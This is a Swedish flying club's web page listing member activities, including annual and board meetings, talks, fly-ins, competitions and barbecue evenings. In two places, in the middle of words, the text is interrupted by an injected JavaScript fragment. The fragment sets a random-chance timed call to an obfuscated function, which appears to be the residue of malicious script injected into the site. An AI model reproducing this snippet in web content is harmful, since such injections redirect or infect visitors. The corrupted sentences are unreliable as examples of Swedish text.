Aktiviteter

För­u­tom att flyga finns det ett antal andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andra akti­vi­te­ter som med­lem­marna kan delta i:

Års­möte
Ordi­na­rie års­möte hålls en gång per år i bör­jan av året, van­lig­vis i klubb­hu­set på Borås Flygplats.

Med­lemsmö­ten
Två-tre gånger per vår/höst har vi möte i klubb­hu­set. Oftast för­sö­ker vi ordna träf­far med mer orga­ni­se­rade inslag i form av före­drag, iblandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and med inbjudna gäs­ter. För när­mare upp­gif­ter om vad som är på gång, titta i Kalen­dern.

Sty­rel­se­mö­ten
Sty­rel­sen träf­fas cirka en gång i månaden.

Övriga akti­vi­te­ter

  • Klubb­flyg­ningar
  • Flyg­täv­lingar
  • Utställ­ning av flygplan
  • Tvätt– och vaxdagar
  • Fly-in’s
  • Öppet Hus-dagar
  • Grill­kväl­lar
  • Flyg­da­gar (“spaka-själv-dagar”)